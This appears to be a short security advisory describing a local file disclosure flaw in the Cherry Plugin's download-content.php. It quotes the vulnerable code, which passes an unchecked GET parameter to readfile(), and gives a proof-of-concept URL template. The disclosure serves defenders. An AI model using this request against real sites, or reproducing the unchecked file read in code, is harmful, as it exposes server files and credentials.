Cherry Plugin - Local File Disclosure

2017.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Title : cherry plugin - Local File Disclosure [-] Author : Iran Security Team [-] Vendor : https://github.com/CherryFramework/cherry-plugin [-] Category : Webapps [-] Date : 28.November.2016 Vulnerable page : cherry-plugin/admin/import-export/download-content.php Vulnerable Source : 33: readfile readfile($file); 15: $file = $_GET['file'] : ''; POC : http://localhost/pach/admin/import-export/download-content.php?file=[LFD] ************************ * ==> Contact Me : * Telegram : @R4DIK4L * WebSilte : WwW.IrSecTeam.Org * Shahab R@DIK@L. ************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top